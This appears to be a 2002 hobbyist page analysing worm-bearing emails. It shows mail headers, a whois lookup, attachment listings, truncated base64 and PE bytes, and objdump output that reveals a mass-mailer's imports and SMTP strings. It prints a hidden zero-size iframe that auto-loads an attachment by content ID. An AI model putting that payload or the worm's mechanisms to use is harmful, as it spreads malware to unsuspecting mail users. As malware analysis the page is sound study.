I'm going to look into a random assortment of various (assumed) viruses, using several tools, to see what I see...
The tools:
Received: from Sqvttrvd ([64.91.96.249]) by out009.verizon.net
(InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP
id <20020502210142.UGGA19693.out009.verizon.net@Sqvttrvd>
for ; Thu, 2 May 2002 16:01:42 -0500
From: morse
To: jsage@finchhaven.com
Subject: A WinXP patch
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=LTmF5571953C8u06448mZzei8x2
Message-Id: <20020502210142.UGGA19693.out009.verizon.net@Sqvttrvd>
Date: Thu, 2 May 2002 16:01:48 -0500
Status: RO
Content-Length: 142718
Lines: 1971
BW whois 2.9 by Bill Weinman (http://whois.bw.org/)
© 1999-2001 William E. Weinman
Century Telephone Enterprises (NETBLK-CENTURY-TEL-4)
4500 Millhaven Road
Monroe, LA 71203
US
Netname: CENTURY-TEL-4
Netblock: 64.91.0.0 - 64.91.127.255
Maintainer: CTEL
Coordinator:
Network Availability (NA397-ORG-ARIN) network@CENTURYTEL.NET
318-361-4900
Fax- 318-361-4949
Domain System inverse mapping provided by:
NS1.CENTURYINTER.NET209.142.136.220
NS2.CENTURYINTER.NET207.230.192.254
I 1 [multipa/alternativ, 7bit, 139K]
I 2 > [text/html, quoted, us-ascii, 0.1K]
I 3 >index[6].exe [applica/octet-stre, base64, 126K]
I 4 > [text/plain, 7bit, iso-8859-1, 12K]
Received: from Ljxk (ip191.134.adsl.online.kz [212.154.134.191])
by mail.online.kz (8.9.3/8.9.3) with SMTP id MAA21883
for ; Mon, 29 Apr 2002 12:12:23 +0700 (AASD)
Date: Mon, 29 Apr 2002 12:12:23 +0700 (AASD)
Message-Id: <200204290512.MAA21883@mail.online.kz>
From: pr
To: handler@incidents.org
Subject: Fw:look,my beautiful girl friend
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=Q2cXQgY509sd138798I
Status: RO
Content-Length: 141966
Lines: 1962
mutt attachments:
I 1[multipa/alternativ, 7bit, 138K] I 2 > [text/html, quoted, us-ascii, 0.1K] I 3 >N [audio/x-wav, base64, 123K] I 4 > [text/plain, 7bit, iso-8859-1, 14K]
The first attachment:
I 1[multipa/alternativ, 7bit, 138K] Content-Type: application/octet-stream; name=WINWORD8.DOC Content-Transfer-Encoding: base64 Content-ID: 0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAEQAAAAAA AAAAEAAAEgAAAAEAAAD+////AAAAABAAAAD///////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// ///////////////////////////////////spcAARQAJBAAAABK/AAAAAAAAEgAAAAAABAAA AQQAAA4AYmpiakLgQuAAAAAAAAAAAAAAAAAAAAAAAAAJBBYAHgwAACCKAQAgigEAAQAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAD//w8A <snip>
The second attachment:
I 2 >[text/html, quoted, us-ascii, 0.1K] <HTML><HEAD></HEAD><BODY> <iframe src=cid:HmUq3G70VIXJ height=0 width=0> </iframe> <FONT></FONT></BODY></HTML>
The third attachment:
I 3 >N [audio/x-wav, base64, 123K] MZ?^@^C^@^@^@^D^@^@^@ÿÿ^@^@¸^@^@^@^@^@^@^@@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@Ø^@^@^@^N^_º^N^@´ Í!¸^ALÍ!This program cannot be run in DOS mode.^M $^@^@^@^@^@^@^@^X?}à\ø^S³\ø^S³\ø^S³'ä^_³Xø^S³ßä^]³Oø^S³´ç^Y³fø^S³>ç^@³Uø^S³\ø^R³%ø^S³´ç^X³ Nø^S³äþ^U³]ø^S³Rich\ø^S³^@^@^@^@^@^@^@^@PE^@^@L^A^D^@¸?·<^@^@^@^@^@^@^@^@à^@^O^A^K^A^F^@ À^@^@^@^@^@^@^@^@X?^@^@^@^P^@^@^@Ð^@^@^@^@@^@^@^P^@^@^@^P^@^@^D^@^@^@^@^@^@^@^D^@^@^@^@^@ ^@^@^@` ^@^@^P^@^@^@^@^@^@^B^@^@^@^@^@^P^@^@^P^@^@^@^@^P^@^@^P^@^@^@^@^@^@^P^@^@^@^@^@^@^@^@^@^@ Ö^@^@d^@^@^@^@P ^@^P^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@Ð^@^@ì^A^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@.text^@^@^@Jº^@^@^@^P^@^@^@À^@^@^@^P^@^@^@^@^@^@^@^@ ^@^@^@^@^@ ^@^@`.rdata^@^@"^P^@^@^@Ð^@^@^@ ^@^@^@Ð^@^@^@^@^@^@^@^@^@^@^@^@^@^@@^@^@@.data^@^@^@l^@^@ð^@^@^@P^@^@^@ð^@^@^@^@^@^@^@^@ ^@^@^@^@^@@^@^@À.rsrc^@^@^@^P^@^@^@^@P ^@^P^@^@^@^@@^A^@^@^@^@^@^@^@^@^@^@^@^@^@@^@^@@^@ <snip>
The fourth attachment:
I 4 >[text/plain, 7bit, iso-8859-1, 14K] Content-Type: application/octet-stream; name=WINWORD8.DOC Content-Transfer-Encoding: base64 Content-ID: 0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAEQAAAAAA AAAAEAAAEgAAAAEAAAD+////AAAAABAAAAD///////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// ///////////////////////////////////spcAARQAJBAAAABK/AAAAAAAAEgAAAAAABAAA AQQAAA4AYmpiakLgQuAAAAAAAAAAAAAAAAAAAAAAAAAJBBYAHgwAACCKAQAgigEAAQAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAD//w8A <snip>
[toot@sparky /home/www/html/sys_docs/virii/binaries]# objdump -x N
N: file format efi-app-ia32
N
architecture: i386, flags 0x0000010a:
EXEC_P, HAS_DEBUG, D_PAGED
start address 0x00408458
Characteristics 0x10f
relocations stripped
executable
line numbers stripped
symbols stripped
32 bit words
Time/Date Fri Apr 12 18:49:44 2002
ImageBase 00400000
SectionAlignment 00001000
FileAlignment 00001000
MajorOSystemVersion 4
MinorOSystemVersion 0
MajorImageVersion 0
MinorImageVersion 0
MajorSubsystemVersion 4
MinorSubsystemVersion 0
Win32Version 00000000
SizeOfImage 00096000
SizeOfHeaders 00001000
CheckSum 00000000
Subsystem 00000002 (Windows GUI)
DllCharacteristics 00000000
SizeOfStackReserve 00100000
SizeOfStackCommit 00001000
SizeOfHeapReserve 00100000
SizeOfHeapCommit 00001000
LoaderFlags 00000000
NumberOfRvaAndSizes 00000010
The Data Directory
Entry 0 00000000 00000000 Export Directory [.edata (or where ever we found it)]
Entry 1 0000d620 00000064 Import Directory [parts of .idata]
Entry 2 00095000 00000010 Resource Directory [.rsrc]
Entry 3 00000000 00000000 Exception Directory [.pdata]
Entry 4 00000000 00000000 Security Directory
Entry 5 00000000 00000000 Base Relocation Directory [.reloc]
Entry 6 00000000 00000000 Debug Directory
Entry 7 00000000 00000000 Description Directory
Entry 8 00000000 00000000 Special Directory
Entry 9 00000000 00000000 Thread Storage Directory [.tls]
Entry a 00000000 00000000 Load Configuration Directory
Entry b 00000000 00000000 Bound Import Directory
Entry c 0000d000 000001ec Import Address Table Directory
Entry d 00000000 00000000 Delay Import Directory
Entry e 00000000 00000000 Reserved
Entry f 00000000 00000000 Reserved
There is an import table in .rdata at 0x40d620
The Import Tables (interpreted .rdata section contents)
vma: Hint Time Forward DLL First
Table Stamp Chain Name Thunk
0000d620 0000d6e8 00000000 00000000 0000dc14 0000d064
DLL Name: KERNEL32.dll
vma: Hint/Ord Member-Name
da20 206 GetComputerNameA
da40 441 IsDBCSLeadByte
da52 735 WriteFile
da5e 536 ReadFile
da6a 355 GetTempFileNameA
da0a 484 MultiByteToWideChar
da34 40 CopyFileA
da9c 616 SetFileAttributesA
dab2 144 FindClose
dabe 157 FindNextFileA
dace 148 FindFirstFileA
dae0 609 SetEndOfFile
d9d0 456 LocalAlloc
da7e 357 GetTempPathA
da8e 87 DeleteFileA
d9f4 722 WideCharToMultiByte
db2e 68 CreateProcessA
db40 345 GetSystemDirectoryA
db56 247 GetCurrentProcess
db6a 667 SystemTimeToFileTime
db82 349 GetSystemTime
db92 373 GetVersionExA
dba2 372 GetVersion
dbb0 718 WaitForSingleObject
dbc6 202 GetCommandLineA
dbd8 128 ExpandEnvironmentStringsA
dbf4 260 GetDriveTypeA
dc04 74 CreateThread
d9de 248 GetCurrentProcessId
d9a4 283 GetLocalTime
d9c4 460 LocalFree
d9b4 282 GetLastError
daf0 618 SetFilePointer
db02 276 GetFileTime
d976 274 GetFileSize
d870 180 FreeLibrary
d890 450 LoadLibraryA
d992 688 UnmapViewOfFile
d984 52 CreateFileA
d93e 508 Process32First
d960 53 CreateFileMappingA
d950 470 MapViewOfFile
d8fc 76 CreateToolhelp32Snapshot
d92e 510 Process32Next
d918 292 GetModuleFileNameA
d8ca 540 ReadProcessMemory
d8ec 473 Module32First
d8de 495 OpenProcess
d8a0 27 CloseHandle
d8b6 670 TerminateProcess
d8ae 662 Sleep
db10 620 SetFileTime
db1e 365 GetTickCount
d87e 318 GetProcAddress
deac 448 LCMapStringW
de9c 447 LCMapStringA
e00e 170 FlushFileBuffers
dffe 636 SetStdHandle
dff0 418 HeapReAlloc
dfe0 699 VirtualAlloc
dfce 342 GetStringTypeW
dfbc 339 GetStringTypeA
dfb0 559 RtlUnwind
dfa2 703 VirtualFree
df94 411 HeapCreate
df86 413 HeapDestroy
df78 277 GetFileType
df68 338 GetStdHandle
de46 294 GetModuleHandleA
de5a 336 GetStartupInfoA
de6c 125 ExitProcess
de7a 191 GetCPInfo
de86 185 GetACP
de90 305 GetOEMCP
df56 621 SetHandleCount
debc 415 HeapFree
dec8 409 HeapAlloc
ded4 685 UnhandledExceptionFilter
def0 178 FreeEnvironmentStringsA
df0a 179 FreeEnvironmentStringsW
df24 262 GetEnvironmentStrings
df3c 264 GetEnvironmentStringsW
The Import Address Table is identical
0000d634 0000d684 00000000 00000000 0000ddf0 0000d000
DLL Name: ADVAPI32.dll
vma: Hint/Ord Member-Name
dc96 325 OpenSCManagerA
dca8 435 StartServiceCtrlDispatcherA
ddd8 245 LookupPrivilegeValueA
ddc0 23 AdjustTokenPrivileges
dd9e 390 RegSetValueExA
dd8a 379 RegQueryValueExA
ddb0 350 RegCreateKeyA
dd64 348 RegConnectRegistryA
dd50 322 OpenProcessToken
dd7a 434 StartServiceA
dd1e 24 AllocateAndInitializeSid
dd12 152 EqualSid
dd3a 208 GetTokenInformation
dcea 398 RegisterServiceCtrlHandlerA
dcda 327 OpenServiceA
dd08 157 FreeSid
dc6e 52 CloseServiceHandle
dc5e 362 RegEnumValueA
dc84 76 CreateServiceA
dc3e 369 RegOpenKeyA
dc30 358 RegEnumKeyA
dc4c 356 RegDeleteValueA
dcc6 430 SetServiceStatus
dc22 347 RegCloseKey
The Import Address Table is identical
0000d648 0000d844 00000000 00000000 0000ddfe 0000d1c0
DLL Name: WS2_32.dll
vma: Hint/Ord Member-Name
80000034 52
80000003 3
80000074 116
80000010 16
80000013 19
80000009 9
80000004 4
8000006f 111
80000073 115
80000017 23
The Import Address Table is identical
0000d65c 0000d834 00000000 00000000 0000de3e 0000d1b0
DLL Name: MPR.dll
vma: Hint/Ord Member-Name
de2e 64 WNetOpenEnumA
de1a 28 WNetEnumResourceA
de0a 17 WNetCloseEnum
The Import Address Table is identical
0000d670 00000000 00000000 00000000 00000000 00000000
Sections:
Idx Name Size VMA LMA File off Algn
0 .text 0000c000 00401000 00401000 00001000 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
1 .rdata 00002000 0040d000 0040d000 0000d000 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .data 00005000 0040f000 0040f000 0000f000 2**2
CONTENTS, ALLOC, LOAD, DATA
3 .rsrc 00000010 00495000 00495000 00014000 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
[toot@sparky /home/www/html/sys_docs/virii/binaries]# objdump -s -j .text N |less N: file format efi-app-ia32 Contents of section .text: 401000 558bec83 ec148b45 10535633 f65733db U......E.SV3.W3. 401010 8975ec89 75f88945 f03b7510 0f8d6f01 .u..u..E.;u...o. 401020 00008b45 f06a035a 3bc28955 f47d0389 ...E.j.Z;..U.}.. 401030 45f48b4d f4b83d3d 3d3d8d7d fc66ab85 E..M..====.}.f.. 401040 c9aa7e15 8b45088d 7dfc03f0 8bc1c1e9 ..~..E..}....... 401050 02f3a58b c823caf3 a48a4dfc 8ac1c0e8 .....#....M..... 401060 0285db88 45ff7426 8b7d1485 ff7e278b ....E.t&.}...~'. 401070 c38b750c 2b45f899 f7ff85d2 751bc604 ..u.+E......u... 401080 330d43c6 04330a43 8345f802 eb0b8b75 3.C..3.C.E.....u 401090 0c8b7d14 eb038b75 0c0fb645 ff8b1530 ..}....u...E...0 <snip>
[toot@sparky /home/www/html/sys_docs/virii/binaries]# objdump -s -j .rdata N |less N: file format efi-app-ia32 Contents of section .rdata: 40d000 96dc0000 a8dc0000 d8dd0000 c0dd0000 ................ 40d010 9edd0000 8add0000 b0dd0000 64dd0000 ............d... 40d020 50dd0000 7add0000 1edd0000 12dd0000 P...z........... 40d030 3add0000 eadc0000 dadc0000 08dd0000 :............... 40d040 6edc0000 5edc0000 84dc0000 3edc0000 n...^.......>... 40d050 30dc0000 4cdc0000 c6dc0000 22dc0000 0...L......."... 40d060 00000000 20da0000 40da0000 52da0000 .... ...@...R... 40d070 5eda0000 6ada0000 0ada0000 34da0000 ^...j.......4... 40d080 9cda0000 b2da0000 beda0000 ceda0000 ................ 40d090 e0da0000 d0d90000 7eda0000 8eda0000 ........~.......
[toot@sparky /home/www/html/sys_docs/virii/binaries]# objdump -s -j .data N |less N: file format efi-app-ia32 Contents of section .data: 40f000 00000000 00000000 00000000 5b894000 ............[.@. 40f010 6fb34000 00000000 00000000 14b44000 o.@...........@. 40f020 00000000 00000000 00000000 00000000 ................ 40f030 330d4100 40000000 20000000 2c000000 3.A.@... ...,... 40f040 2d2d0000 5c000000 51554954 0d0a0000 --..\...QUIT.... 40f050 0d0a2e0d 0a000000 44415441 200d0a00 ........DATA ... 40f060 48454c4f 2025730d 0a000000 3e0d0a00 HELO %s.....>... 40f070 4d41494c 2046524f 4d3a203c 00000000 MAIL FROM: <.... 40f080 52435054 20544f3a 3c000000 25640000 RCPT TO:<...%d.. 40f090 20090d0a 00000000 2e2c2829 25244021 ........,()%$@! <snip>
[toot@sparky /home/www/html/sys_docs/virii/binaries]# objdump -s -j .rsrc N |less N: file format efi-app-ia32 Contents of section .rsrc: 495000 00000000 00000000 00000000 00000000 ................
jsage@finchhaven.com Last modified: Thu May 2 18:41:02 2002